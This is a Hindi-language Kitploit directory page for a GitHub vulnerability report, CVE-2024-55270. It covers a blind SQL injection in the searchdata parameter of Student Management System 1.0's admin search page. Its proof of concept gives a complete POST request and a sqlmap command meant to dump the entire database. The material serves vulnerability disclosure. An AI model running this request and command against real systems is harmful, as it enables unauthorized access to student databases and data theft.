Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/shoaibalam112/cve-2024-55270
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshoaibalam112/cve-2024-55270

CVE-2024-55270

PHP और MySQL का उपयोग करके छात्र प्रबंधन प्रणाली

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

छात्र प्रबंधन प्रणाली 1.0 (CVE-2024-55270)

अवलोकन

छात्र प्रबंधन प्रणाली (SMS) एक वेब एप्लिकेशन है जिसे PHP और MySQL का उपयोग करके छात्र जानकारी प्रबंधित करने के लिए विकसित किया गया है। इस रिपॉजिटरी में सिस्टम का स्रोत कोड और विवरण, साथ ही एक सुरक्षा भेद्यता रिपोर्ट शामिल है।

ऑडिटर:
Shoaib Alam - LinkedIn प्रोफ़ाइल


सुरक्षा भेद्यता रिपोर्ट

विवरण

छात्र प्रबंधन प्रणाली में एक ब्लाइंड SQL इंजेक्शन भेद्यता का पता चला है। यह समस्या एप्लिकेशन की खोज कार्यक्षमता में searchdata पैरामीटर को प्रभावित करती है।

  • भेद्य एंडपॉइंट: /studentms/admin/search.php
  • भेद्य पैरामीटर: searchdata

searchdata पैरामीटर अपर्याप्त इनपुट सैनिटाइज़ेशन के कारण ब्लाइंड SQL इंजेक्शन के प्रति संवेदनशील है। एक हमलावर इनपुट में दुर्भावनापूर्ण SQL क्वेरी इंजेक्ट करके इस भेद्यता का शोषण कर सकता है, जिससे संभावित रूप से डेटाबेस या अन्य संवेदनशील जानकारी तक अनधिकृत पहुंच प्राप्त हो सकती है।

searchdata

प्रूफ ऑफ कॉन्सेप्ट (PoC)

भेद्य URL

/studentms/admin/search.php

उदाहरण POST अनुरोध

root@kitploit:~
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

searchdata=*&search=
  1. उपरोक्त POST अनुरोध को notepad या किसी भी टेक्स्ट एडिटर का उपयोग करके req.txt में सहेजें।

  2. उपरोक्त का शोषण करने के लिए SQLMAP जैसे टूल का उपयोग करें और यह कमांड लागू करें (आप अपना खुद का कस्टमाइज़ कर सकते हैं): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3

उपरोक्त कमांड वेब एप्लिकेशन के पूरे डेटाबेस को डंप कर देगा।

टूल डाउनलोड करें